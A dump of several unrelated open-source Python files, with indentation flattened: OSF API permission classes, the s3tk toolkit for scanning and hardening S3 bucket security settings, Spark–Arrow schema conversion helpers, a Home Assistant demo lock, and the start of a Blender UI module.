return node.has_permission(auth.user, osf_permissions.ADMIN)
class ContributorOrPublicForPointers(permissions.BasePermission):
acceptable_models = (AbstractNode, NodeRelation,)
def has_object_permission(self, request, view, obj):
assert_resource_type(obj, self.acceptable_models)
auth = get_user_auth(request)
parent_node = AbstractNode.load(request.parser_context['kwargs']['node_id'])
pointer_node = NodeRelation.load(request.parser_context['kwargs']['node_link_id']).child
if request.method in permissions.SAFE_METHODS:
has_parent_auth = parent_node.can_view(auth)
has_pointer_auth = pointer_node.can_view(auth)
public = pointer_node.is_public
has_auth = public or (has_parent_auth and has_pointer_auth)
return has_auth
else:
has_auth = parent_node.can_edit(auth)
return has_auth
class ContributorOrPublicForRelationshipPointers(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
assert isinstance(obj, dict)
auth = get_user_auth(request)
parent_node = obj['self']
if request.method in permissions.SAFE_METHODS:
return parent_node.can_view(auth)
elif request.method == 'DELETE':
return parent_node.can_edit(auth)
else:
has_parent_auth = parent_node.can_edit(auth)
if not has_parent_auth:
return False
pointer_nodes = []
for pointer in request.data.get('data', []):
node = AbstractNode.load(pointer['id'])
if not node or node.is_collection:
raise exceptions.NotFound(detail='Node with id "{}" was not found'.format(pointer['id']))
pointer_nodes.append(node)
has_pointer_auth = True
for pointer in pointer_nodes:
if not pointer.can_view(auth):
has_pointer_auth = False
break
return has_pointer_auth
class RegistrationAndPermissionCheckForPointers(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
node_link = NodeRelation.load(request.parser_context['kwargs']['node_link_id'])
node = AbstractNode.load(request.parser_context['kwargs'][view.node_lookup_url_kwarg])
auth = get_user_auth(request)
if request.method == 'DELETE'and node.is_registration:
raise exceptions.MethodNotAllowed(method=request.method)
if node.is_collection or node.is_registration:
raise exceptions.NotFound
if node != node_link.parent:
raise exceptions.NotFound
if request.method == 'DELETE' and not node.can_edit(auth):
return False
return True
class WriteOrPublicForRelationshipInstitutions(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
assert isinstance(obj, dict)
auth = get_user_auth(request)
node = obj['self']
if request.method in permissions.SAFE_METHODS:
return node.is_public or node.can_view(auth)
else:
return node.has_permission(auth.user, osf_permissions.WRITE)
class ReadOnlyIfRegistration(permissions.BasePermission):
"""Makes PUT and POST forbidden for registrations."""
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
# Preprints cannot be registrations
if isinstance(obj, Preprint):
return True
if not isinstance(obj, AbstractNode):
obj = AbstractNode.load(request.parser_context['kwargs'][view.node_lookup_url_kwarg])
assert_resource_type(obj, self.acceptable_models)
if obj.is_registration:
return request.method in permissions.SAFE_METHODS
return True
class WriteAdmin(permissions.BasePermission):
acceptable_models = (AbstractNode,)
def has_object_permission(self, request, view, obj):
auth = get_user_auth(request)
return obj.can_edit(auth)
class ShowIfVersion(permissions.BasePermission):
def __init__(self, min_version, max_version, deprecated_message):
super(ShowIfVersion, self).__init__()
self.min_version = min_version
self.max_version = max_version
self.deprecated_message = deprecated_message
def has_object_permission(self, request, view, obj):
if is_deprecated(request.version, self.min_version, self.max_version):
raise exceptions.NotFound(detail=self.deprecated_message)
return True
class NodeLinksShowIfVersion(ShowIfVersion):
def __init__(self):
min_version = '2.0'
max_version = '2.0'
deprecated_message = 'This feature is deprecated as of version 2.1'
super(NodeLinksShowIfVersion, self).__init__(min_version, max_version, deprecated_message)
|
s3tk/__init__.py | ankane/s3tk | 432 | 12610870 | # -*- coding: utf-8 -*-
import sys
import os.path
import json
import fnmatch
from collections import Counter, OrderedDict
import boto3
import botocore
import click
from joblib import Parallel, delayed
from clint.textui import colored, puts, indent
from .checks import AclCheck, PolicyCheck, PublicAccessCheck, LoggingCheck, VersioningCheck, EncryptionCheck, ObjectLoggingCheck
__version__ = '0.3.1'
canned_acls = [
{
'acl': 'private',
'grants': []
},
{
'acl': 'public-read',
'grants': [
{'Grantee': {'Type': 'Group', 'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'}, 'Permission': 'READ'}
]
},
{
'acl': 'public-read-write',
'grants': [
{'Grantee': {'Type': 'Group', 'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'}, 'Permission': 'READ'},
{'Grantee': {u'Type': 'Group', u'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'}, 'Permission': 'WRITE'}
]
},
{
'acl': 'authenticated-read',
'grants': [
{'Grantee': {'Type': 'Group', 'URI': 'http://acs.amazonaws.com/groups/global/AuthenticatedUsers'}, 'Permission': 'READ'}
]
},
{
'acl': 'aws-exec-read',
'grants': [
{'Grantee': {'Type': 'CanonicalUser', 'DisplayName': 'za-team', 'ID': '6aa5a366c34c1cbe25dc49211496e913e0351eb0e8c37aa3477e40942ec6b97c'}, 'Permission': 'READ'}
]
}
]
cached_s3 = None
def s3():
# memoize
global cached_s3
if cached_s3 is None:
cached_s3 = boto3.resource('s3')
return cached_s3
def notice(message):
puts(colored.yellow(message))
def abort(message):
puts(colored.red(message))
sys.exit(1)
def unicode_key(key):
if sys.version_info[0] < 3 and isinstance(key, unicode):
return key.encode('utf-8')
else:
return key
def perform(check):
check.perform()
with indent(2):
if check.status == 'passed':
puts(colored.green('✔ ' + check.name + ' ' + unicode_key(check.pass_message)))
elif check.status == 'failed':
puts(colored.red('✘ ' + check.name + ' ' + check.fail_message))
else:
puts(colored.red('✘ ' + check.name + ' access denied'))
return check
def fetch_buckets(buckets):
if buckets:
if any('*' in b for b in buckets):
return [b for b in s3().buckets.all() if any(fnmatch.fnmatch(b.name, bn) for bn in buckets)]
else:
return [s3().Bucket(bn) for bn in buckets]
else:
return s3().buckets.all()
def fix_check(klass, buckets, dry_run, fix_args={}):
for bucket in fetch_buckets(buckets):
check = klass(bucket)
check.perform()
if check.status == 'passed':
message = colored.green('already ' + check.pass_message)
elif check.status == 'denied':
message = colored.red('access denied')
else:
if dry_run:
message = colored.yellow('to be ' + check.pass_message)
else:
try:
check.fix(fix_args)
message = colored.blue('just ' + check.pass_message)
except botocore.exceptions.ClientError as e:
message = colored.red(str(e))
puts(bucket.name + ' ' + message)
def encrypt_object(bucket_name, key, dry_run, kms_key_id, customer_key):
obj = s3().Object(bucket_name, key)
str_key = unicode_key(key)
try:
if customer_key:
obj.load(SSECustomerAlgorithm='AES256', SSECustomerKey=customer_key)
encrypted = None
if customer_key:
encrypted = obj.sse_customer_algorithm is not None
elif kms_key_id:
encrypted = obj.server_side_encryption == 'aws:kms'
else:
encrypted = obj.server_side_encryption == 'AES256'
if encrypted:
puts(str_key + ' ' + colored.green('already encrypted'))
return 'already encrypted'
else:
if dry_run:
puts(str_key + ' ' + colored.yellow('to be encrypted'))
return 'to be encrypted'
else:
copy_source = {'Bucket': bucket_name, 'Key': obj.key}
# TODO support going from customer encryption to other forms
if kms_key_id:
obj.copy_from(
CopySource=copy_source,
ServerSideEncryption='aws:kms',
SSEKMSKeyId=kms_key_id
)
elif customer_key:
obj.copy_from(
CopySource=copy_source,
SSECustomerAlgorithm='AES256',
SSECustomerKey=customer_key
)
else:
obj.copy_from(
CopySource=copy_source,
ServerSideEncryption='AES256'
)
puts(str_key + ' ' + colored.blue('just encrypted'))
return 'just encrypted'
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(str_key + ' ' + colored.red(str(e)))
return 'error'
def determine_mode(acl):
owner = acl.owner
grants = acl.grants
non_owner_grants = [grant for grant in grants if not (grant['Grantee'].get('ID') == owner['ID'] and grant['Permission'] == 'FULL_CONTROL')]
# TODO bucket-owner-read and bucket-owner-full-control
return next((ca['acl'] for ca in canned_acls if ca['grants'] == non_owner_grants), 'custom')
def scan_object(bucket_name, key):
obj = s3().Object(bucket_name, key)
str_key = unicode_key(key)
try:
mode = determine_mode(obj.Acl())
if mode == 'private':
puts(str_key + ' ' + colored.green(mode))
else:
puts(str_key + ' ' + colored.yellow(mode))
return mode
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(str_key + ' ' + colored.red(str(e)))
return 'error'
def reset_object(bucket_name, key, dry_run, acl):
obj = s3().Object(bucket_name, key)
str_key = unicode_key(key)
try:
obj_acl = obj.Acl()
mode = determine_mode(obj_acl)
if mode == acl:
puts(str_key + ' ' + colored.green('ACL already ' + acl))
return 'ACL already ' + acl
elif dry_run:
puts(str_key + ' ' + colored.yellow('ACL to be updated to ' + acl))
return 'ACL to be updated to ' + acl
else:
obj_acl.put(ACL=acl)
puts(str_key + ' ' + colored.blue('ACL updated to ' + acl))
return 'ACL updated to ' + acl
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(str_key + ' ' + colored.red(str(e)))
return 'error'
def delete_unencrypted_version(bucket_name, key, id, dry_run):
object_version = s3().ObjectVersion(bucket_name, key, id)
try:
obj = object_version.get()
if obj.get('ServerSideEncryption') or obj.get('SSECustomerAlgorithm'):
puts(key + ' ' + id + ' ' + colored.green('encrypted'))
return 'encrypted'
else:
if dry_run:
puts(key + ' ' + id + ' ' + colored.blue('to be deleted'))
return 'to be deleted'
else:
puts(key + ' ' + id + ' ' + colored.blue('deleted'))
object_version.delete()
return 'deleted'
except (botocore.exceptions.ClientError, botocore.exceptions.NoCredentialsError) as e:
puts(key + ' ' + id + ' ' + colored.red(str(e)))
return 'error'
def object_matches(key, only, _except):
match = True
if only:
match = fnmatch.fnmatch(key, only)
if _except and match:
match = not fnmatch.fnmatch(key, _except)
return match
def parallelize(bucket, only, _except, fn, args=(), versions=False):
bucket = s3().Bucket(bucket)
# use prefix for performance
prefix = None
if only:
# get the first prefix before wildcard
prefix = '/'.join(only.split('*')[0].split('/')[:-1])
if prefix:
prefix = prefix + '/'
if versions:
object_versions = bucket.object_versions.filter(Prefix=prefix) if prefix else bucket.object_versions.all()
# delete markers have no size
return Parallel(n_jobs=24)(delayed(fn)(bucket.name, ov.object_key, ov.id, *args) for ov in object_versions if object_matches(ov.object_key, only, _except) and not ov.is_latest and ov.size is not None)
else:
objects = bucket.objects.filter(Prefix=prefix) if prefix else bucket.objects.all()
if only and not '*' in only:
objects = [s3().Object(bucket, only)]
return Parallel(n_jobs=24)(delayed(fn)(bucket.name, os.key, *args) for os in objects if object_matches(os.key, only, _except))
def public_statement(bucket):
return OrderedDict([
('Sid', 'Public'),
('Effect', 'Allow'),
('Principal', '*'),
('Action', 's3:GetObject'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name)
])
def no_object_acl_statement(bucket):
return OrderedDict([
('Sid', 'NoObjectAcl'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', 's3:PutObjectAcl'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name)
])
def public_uploads_statement(bucket):
return OrderedDict([
('Sid', 'PublicUploads'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', ['s3:PutObject', 's3:PutObjectAcl']),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name),
('Condition', {'StringNotEquals': {'s3:x-amz-acl': 'public-read'}})
])
def no_uploads_statement(bucket):
return OrderedDict([
('Sid', 'NoUploads'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', 's3:PutObject'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name)
])
def encryption_statement(bucket):
return OrderedDict([
('Sid', 'Encryption'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', 's3:PutObject'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name),
('Condition', {'StringNotEquals': {'s3:x-amz-server-side-encryption': 'AES256'}})
])
def statement_matches(s1, s2):
s1 = dict(s1)
s2 = dict(s2)
s1.pop('Sid', None)
s2.pop('Sid', None)
return s1 == s2
def fetch_policy(bucket):
policy = None
try:
policy = bucket.Policy().policy
except botocore.exceptions.ClientError as e:
if 'NoSuchBucket' not in str(e):
raise
if policy:
policy = json.loads(policy, object_pairs_hook=OrderedDict)
return policy
def print_dns_bucket(name, buckets, found_buckets):
if not name in found_buckets:
puts(name)
with indent(2):
if name in buckets:
puts(colored.green('owned'))
else:
puts(colored.red('not owned'))
puts()
found_buckets.add(name)
def print_policy(policy):
with indent(2):
if any(policy['Statement']):
puts(colored.yellow(json.dumps(policy, indent=4)))
else:
puts(colored.yellow("None"))
def summarize(values):
summary = Counter(values)
puts()
puts("Summary")
for k, v in summary.most_common():
puts(k + ': ' + str(v))
def fetch_event_selectors():
# TODO get trails across all regions
# even regions without buckets may have multi-region trails
client = boto3.client('cloudtrail')
paginator = client.get_paginator('list_trails')
event_selectors = {}
for page in paginator.paginate():
for trail in page['Trails']:
name = trail['Name']
region_client = boto3.client('cloudtrail', region_name=trail['HomeRegion'])
response = region_client.get_event_selectors(TrailName=name)
for event_selector in response['EventSelectors']:
read_write_type = event_selector['ReadWriteType']
for data_resource in event_selector['DataResources']:
if data_resource['Type'] == 'AWS::S3::Object':
for value in data_resource['Values']:
if value == 'arn:aws:s3':
trail_response = region_client.get_trail(Name=name)['Trail']
if trail_response['IsMultiRegionTrail']:
bucket = ('global')
else:
bucket = ('region', trail['HomeRegion'])
path = ''
else:
parts = value.split("/", 2)
bucket = ('bucket', parts[0].replace('arn:aws:s3:::', ''))
path = parts[1]
if bucket not in event_selectors:
event_selectors[bucket] = []
event_selectors[bucket].append({'trail': name, 'path': path, 'read_write_type': read_write_type})
return event_selectors
@click.group()
@click.version_option(version=__version__)
def cli():
pass
@cli.command()
@click.argument('buckets', nargs=-1)
@click.option('--log-bucket', multiple=True, help='Check log bucket(s)')
@click.option('--log-prefix', help='Check log prefix')
@click.option('--skip-logging', is_flag=True, help='Skip logging check')
@click.option('--skip-versioning', is_flag=True, help='Skip versioning check')
@click.option('--skip-default-encryption', is_flag=True, help='Skip default encryption check')
@click.option('--default-encryption', is_flag=True) # no op, can't hide from help until click 7 released
@click.option('--object-level-logging', is_flag=True)
@click.option('--sns-topic', help='Send SNS notification for failures')
def scan(buckets, log_bucket=None, log_prefix=None, skip_logging=False, skip_versioning=False, skip_default_encryption=False, default_encryption=True, object_level_logging=False, sns_topic=None):
event_selectors = fetch_event_selectors() if object_level_logging else {}
checks = []
for bucket in fetch_buckets(buckets):
puts(bucket.name)
checks.append(perform(AclCheck(bucket)))
checks.append(perform(PolicyCheck(bucket)))
checks.append(perform(PublicAccessCheck(bucket)))
if not skip_logging:
checks.append(perform(LoggingCheck(bucket, log_bucket=log_bucket, log_prefix=log_prefix)))
if not skip_versioning:
checks.append(perform(VersioningCheck(bucket)))
if not skip_default_encryption:
checks.append(perform(EncryptionCheck(bucket)))
if object_level_logging:
checks.append(perform(ObjectLoggingCheck(bucket, event_selectors=event_selectors)))
puts()
failed_checks = [c for c in checks if c.status != 'passed']
if any(failed_checks):
if sns_topic:
topic = boto3.resource('sns').Topic(sns_topic)
message = ''
for check in failed_checks:
msg = check.fail_message if check.status == 'failed' else 'access denied'
message += check.bucket.name + ': ' + check.name + ' ' + msg + '\n'
topic.publish(Message=message, Subject='[s3tk] Scan Failures')
sys.exit(1)
@cli.command(name='scan-dns')
def scan_dns():
buckets = set([b.name for b in s3().buckets.all()])
found_buckets = set()
client = boto3.client('route53')
paginator = client.get_paginator('list_hosted_zones')
for page in paginator.paginate():
for hosted_zone in page['HostedZones']:
paginator2 = client.get_paginator('list_resource_record_sets')
for page2 in paginator2.paginate(HostedZoneId=hosted_zone['Id']):
for resource_set in page2['ResourceRecordSets']:
if resource_set.get('AliasTarget'):
value = resource_set['AliasTarget']['DNSName']
if value.startswith('s3-website-') and value.endswith('.amazonaws.com.'):
print_dns_bucket(resource_set['Name'][:-1], buckets, found_buckets)
elif resource_set.get('ResourceRecords'):
for record in resource_set['ResourceRecords']:
value = record['Value']
if value.endswith('.s3.amazonaws.com'):
print_dns_bucket('.'.join(value.split('.')[:-3]), buckets, found_buckets)
if 's3-website-' in value and value.endswith('.amazonaws.com'):
print_dns_bucket(resource_set['Name'][:-1], buckets, found_buckets)
@cli.command(name='block-public-access')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
def block_public_access(buckets, dry_run=False):
if not buckets:
abort('Must specify at least one bucket or wildcard')
fix_check(PublicAccessCheck, buckets, dry_run)
@cli.command(name='enable-logging')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
@click.option('--log-bucket', required=True, help='Bucket to store logs')
@click.option('--log-prefix', help='Log prefix')
def enable_logging(buckets, log_bucket=None, log_prefix=None, dry_run=False):
fix_check(LoggingCheck, buckets, dry_run, {'log_bucket': log_bucket, 'log_prefix': log_prefix})
@cli.command(name='enable-versioning')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
def enable_versioning(buckets, dry_run=False):
fix_check(VersioningCheck, buckets, dry_run)
@cli.command(name='enable-default-encryption')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
def enable_versioning(buckets, dry_run=False):
fix_check(EncryptionCheck, buckets, dry_run)
@cli.command()
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
@click.option('--dry-run', is_flag=True, help='Dry run')
@click.option('--kms-key-id', help='KMS key id')
@click.option('--customer-key', help='Customer key')
def encrypt(bucket, only=None, _except=None, dry_run=False, kms_key_id=None, customer_key=None):
summarize(parallelize(bucket, only, _except, encrypt_object, (dry_run, kms_key_id, customer_key,)))
@cli.command(name='scan-object-acl')
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
def scan_object_acl(bucket, only=None, _except=None):
summarize(parallelize(bucket, only, _except, scan_object))
@cli.command(name='reset-object-acl')
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
@click.option('--acl', default='private', help='ACL to use')
@click.option('--dry-run', is_flag=True, help='Dry run')
def reset_object_acl(bucket, only=None, _except=None, acl=None, dry_run=False):
summarize(parallelize(bucket, only, _except, reset_object, (dry_run, acl,)))
@cli.command(name='delete-unencrypted-versions')
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
@click.option('--dry-run', is_flag=True, help='Dry run')
def delete_unencrypted_versions(bucket, only=None, _except=None, dry_run=False):
summarize(parallelize(bucket, only, _except, delete_unencrypted_version, (dry_run,), True))
@cli.command(name='list-policy')
@click.argument('buckets', nargs=-1)
@click.option('--named', is_flag=True, help='Print named statements')
def list_policy(buckets, named=False):
for bucket in fetch_buckets(buckets):
puts(bucket.name)
policy = fetch_policy(bucket)
with indent(2):
if policy is None:
puts(colored.yellow('None'))
else:
if named:
public = public_statement(bucket)
no_object_acl = no_object_acl_statement(bucket)
public_uploads = public_uploads_statement(bucket)
no_uploads = no_uploads_statement(bucket)
encryption = encryption_statement(bucket)
for statement in policy['Statement']:
if statement_matches(statement, public):
named_statement = 'Public'
elif statement_matches(statement, no_object_acl):
named_statement = 'No object ACL'
elif statement_matches(statement, public_uploads):
named_statement = 'Public uploads'
elif statement_matches(statement, no_uploads):
named_statement = 'No uploads'
elif statement_matches(statement, encryption):
named_statement = 'Encryption'
else:
named_statement = 'Custom'
puts(colored.yellow(named_statement))
else:
puts(colored.yellow(json.dumps(policy, indent=4)))
puts()
@cli.command(name='set-policy')
@click.argument('bucket')
@click.option('--public', is_flag=True, help='Make all objects public')
@click.option('--no-object-acl', is_flag=True, help='Prevent object ACL')
@click.option('--public-uploads', is_flag=True, help='Only public uploads')
@click.option('--no-uploads', is_flag=True, help='Prevent new uploads')
@click.option('--encryption', is_flag=True, help='Require encryption')
@click.option('--dry-run', is_flag=True, help='Dry run')
def set_policy(bucket, public=False, no_object_acl=False, public_uploads=False, no_uploads=False, encryption=False, dry_run=False):
bucket = s3().Bucket(bucket)
bucket_policy = bucket.Policy()
statements = []
if public:
statements.append(public_statement(bucket))
if no_object_acl:
statements.append(no_object_acl_statement(bucket))
if public_uploads:
statements.append(public_uploads_statement(bucket))
if no_uploads:
statements.append(no_uploads_statement(bucket))
if encryption:
statements.append(encryption_statement(bucket))
if any(statements):
puts('New policy')
policy = OrderedDict([
('Version', '2012-10-17'),
('Statement', statements)
])
print_policy(policy)
if not dry_run:
bucket_policy.put(Policy=json.dumps(policy))
else:
abort('No policies specified')
# experimental
@cli.command(name='update-policy')
@click.argument('bucket')
@click.option('--encryption/--no-encryption', default=None, help='Require encryption')
@click.option('--dry-run', is_flag=True, help='Dry run')
def update_policy(bucket, encryption=None, dry_run=False):
bucket = s3().Bucket(bucket)
policy = fetch_policy(bucket)
if not policy:
policy = OrderedDict([
('Version', '2012-10-17'),
('Statement', [])
])
es = encryption_statement(bucket)
es_index = next((i for i, s in enumerate(policy['Statement']) if statement_matches(s, es)), -1)
if es_index != -1:
if encryption:
puts("No encryption change")
print_policy(policy)
elif encryption is False:
puts("Removing encryption")
policy['Statement'].pop(es_index)
print_policy(policy)
if not dry_run:
if any(policy['Statement']):
bucket.Policy().put(Policy=json.dumps(policy))
else:
bucket.Policy().delete()
else:
if encryption:
puts("Adding encryption")
policy['Statement'].append(es)
print_policy(policy)
if not dry_run:
bucket.Policy().put(Policy=json.dumps(policy))
elif encryption is False:
puts(colored.yellow("No encryption change"))
print_policy(policy)
@cli.command(name='delete-policy')
@click.argument('bucket')
def delete_policy(bucket):
s3().Bucket(bucket).Policy().delete()
puts('Policy deleted')
|
fugue_spark/_utils/convert.py | kvnkho/fugue | 547 | 12610878 | from typing import Any, Iterable, List, Tuple
import pyarrow as pa
import pyspark.sql as ps
import pyspark.sql.types as pt
try: # pyspark < 3
from pyspark.sql.types import from_arrow_type, to_arrow_type # type: ignore
# https://issues.apache.org/jira/browse/SPARK-29041
pt._acceptable_types[pt.BinaryType] = (bytearray, bytes) # type: ignore # pragma: no cover # noqa: E501 # pylint: disable=line-too-long
except ImportError: # pyspark >=3
from pyspark.sql.pandas.types import from_arrow_type, to_arrow_type
from pyarrow.types import is_list, is_struct, is_timestamp
from triad.collections import Schema
from triad.utils.assertion import assert_arg_not_none, assert_or_throw
from triad.utils.pyarrow import TRIAD_DEFAULT_TIMESTAMP
def to_spark_schema(obj: Any) -> pt.StructType:
assert_arg_not_none(obj, "schema")
if isinstance(obj, pt.StructType):
return obj
if isinstance(obj, ps.DataFrame):
return obj.schema
return _from_arrow_schema(Schema(obj).pa_schema)
def to_schema(obj: Any) -> Schema:
assert_arg_not_none(obj, "obj")
if isinstance(obj, pt.StructType):
return Schema(_to_arrow_schema(obj))
if isinstance(obj, ps.DataFrame):
return to_schema(obj.schema)
return Schema(obj)
def to_cast_expression(
schema1: Any, schema2: Any, allow_name_mismatch: bool
) -> Tuple[bool, List[str]]:
schema1 = to_spark_schema(schema1)
schema2 = to_spark_schema(schema2)
assert_or_throw(
len(schema1) == len(schema2),
lambda: ValueError(f"schema mismatch: {schema1}, {schema2}"),
)
expr: List[str] = []
has_cast = False
for i in range(len(schema1)):
name_match = schema1[i].name == schema2[i].name
assert_or_throw(
name_match or allow_name_mismatch,
lambda: ValueError(f"schema name mismatch: {schema1}, {schema2}"),
)
if schema1[i].dataType != schema2[i].dataType:
type2 = schema2[i].dataType.simpleString()
if isinstance(schema1[i].dataType, pt.FractionalType) and isinstance(
schema2[i].dataType, (pt.StringType, pt.IntegralType)
):
expr.append(
f"CAST(IF(isnan({schema1[i].name}) OR {schema1[i].name} IS NULL"
f", NULL, {schema1[i].name})"
f" AS {type2}) {schema2[i].name}"
)
else:
expr.append(f"CAST({schema1[i].name} AS {type2}) {schema2[i].name}")
has_cast = True
else:
if schema1[i].name != schema2[i].name:
expr.append(f"{schema1[i].name} AS {schema2[i].name}")
has_cast = True
else:
expr.append(schema1[i].name)
return has_cast, expr
def to_select_expression(schema_from: Any, schema_to: Any) -> List[str]:
schema1 = to_spark_schema(schema_from)
if isinstance(schema_to, List):
return [schema1[n].name for n in schema_to]
schema2 = to_spark_schema(schema_to)
sub = pt.StructType([schema1[x.name] for x in schema2.fields])
_, expr = to_cast_expression(sub, schema2, allow_name_mismatch=False)
return expr
def to_type_safe_input(rows: Iterable[ps.Row], schema: Schema) -> Iterable[List[Any]]:
struct_idx = [p for p, t in enumerate(schema.types) if pa.types.is_struct(t)]
complex_list_idx = [
p
for p, t in enumerate(schema.types)
if pa.types.is_list(t) and pa.types.is_nested(t.value_type)
]
if len(struct_idx) == 0 and len(complex_list_idx) == 0:
for row in rows:
yield list(row)
elif len(complex_list_idx) == 0:
for row in rows:
r = list(row)
for i in struct_idx:
if r[i] is not None:
r[i] = r[i].asDict(recursive=True)
yield r
else:
for row in rows:
data = row.asDict(recursive=True)
r = [data[n] for n in schema.names]
yield r
# TODO: the following function always set nullable to true,
# but should we use field.nullable?
def _to_arrow_type(dt: pt.DataType) -> pa.DataType:
if isinstance(dt, pt.TimestampType):
return TRIAD_DEFAULT_TIMESTAMP
if isinstance(dt, pt.StructType):
fields = [
pa.field(
# field.name, _to_arrow_type(field.dataType), nullable=field.nullable
field.name,
_to_arrow_type(field.dataType),
nullable=True,
)
for field in dt
]
return pa.struct(fields)
return to_arrow_type(dt)
def _to_arrow_schema(schema: pt.StructType) -> pa.Schema:
fields = [
# pa.field(field.name, _to_arrow_type(field.dataType), nullable=field.nullable)
pa.field(field.name, _to_arrow_type(field.dataType), nullable=True)
for field in schema
]
return pa.schema(fields)
def _from_arrow_type(dt: pa.DataType) -> pt.DataType:
if is_struct(dt):
return pt.StructType(
[
pt.StructField(
# field.name, _from_arrow_type(field.type), nullable=field.nullable
field.name,
_from_arrow_type(field.type),
nullable=True,
)
for field in dt
]
)
elif is_list(dt):
if is_timestamp(dt.value_type):
raise TypeError( # pragma: no cover
"Spark: unsupported type in conversion from Arrow: " + str(dt)
)
return pt.ArrayType(_from_arrow_type(dt.value_type))
return from_arrow_type(dt)
def _from_arrow_schema(schema: pa.Schema) -> pt.StructType:
return pt.StructType(
[
pt.StructField(
# field.name, _from_arrow_type(field.type), nullable=field.nullable
field.name,
_from_arrow_type(field.type),
nullable=True,
)
for field in schema
]
)
|
homeassistant/components/demo/lock.py | mtarjoianu/core | 1,635 | 12610889 | <reponame>mtarjoianu/core
"""Demo lock platform that has two fake locks."""
from __future__ import annotations
import asyncio
from homeassistant.components.lock import LockEntity, LockEntityFeature
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
STATE_JAMMED,
STATE_LOCKED,
STATE_LOCKING,
STATE_UNLOCKED,
STATE_UNLOCKING,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
LOCK_UNLOCK_DELAY = 2 # Used to give a realistic lock/unlock experience in frontend
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Demo lock platform."""
async_add_entities(
[
DemoLock("Front Door", STATE_LOCKED),
DemoLock("Kitchen Door", STATE_UNLOCKED),
DemoLock("Poorly Installed Door", STATE_UNLOCKED, False, True),
DemoLock("Openable Lock", STATE_LOCKED, True),
]
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Demo config entry."""
await async_setup_platform(hass, {}, async_add_entities)
class DemoLock(LockEntity):
"""Representation of a Demo lock."""
_attr_should_poll = False
def __init__(
self,
name: str,
state: str,
openable: bool = False,
jam_on_operation: bool = False,
) -> None:
"""Initialize the lock."""
self._attr_name = name
if openable:
self._attr_supported_features = LockEntityFeature.OPEN
self._state = state
self._openable = openable
self._jam_on_operation = jam_on_operation
@property
def is_locking(self):
"""Return true if lock is locking."""
return self._state == STATE_LOCKING
@property
def is_unlocking(self):
"""Return true if lock is unlocking."""
return self._state == STATE_UNLOCKING
@property
def is_jammed(self):
"""Return true if lock is jammed."""
return self._state == STATE_JAMMED
@property
def is_locked(self):
"""Return true if lock is locked."""
return self._state == STATE_LOCKED
async def async_lock(self, **kwargs):
"""Lock the device."""
self._state = STATE_LOCKING
self.async_write_ha_state()
await asyncio.sleep(LOCK_UNLOCK_DELAY)
if self._jam_on_operation:
self._state = STATE_JAMMED
else:
self._state = STATE_LOCKED
self.async_write_ha_state()
async def async_unlock(self, **kwargs):
"""Unlock the device."""
self._state = STATE_UNLOCKING
self.async_write_ha_state()
await asyncio.sleep(LOCK_UNLOCK_DELAY)
self._state = STATE_UNLOCKED
self.async_write_ha_state()
async def async_open(self, **kwargs):
"""Open the door latch."""
self._state = STATE_UNLOCKED
self.async_write_ha_state()
@property
def supported_features(self):
"""Flag supported features."""
if self._openable:
return LockEntityFeature.OPEN
return 0
|
release/scripts/startup/bl_ui/properties_scene.py | gunslingster/CSC581-assignement1 | 365 | 12610890 | <reponame>gunslingster/CSC581-assignement1
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import (
Panel,
UIList,
)
from rna_prop_ui import PropertyPanel
from bl_ui.properties_physics_common import (
point_cache_ui,
effector_weights_ui,
)
class SCENE_UL_keying_set_paths(UIList):
def draw_item(self, _context, layout, _data, item, icon, _active_data, _active_propname, _index):
# assert(isinstance(item, bpy.types.KeyingSetPath)
kspath = item
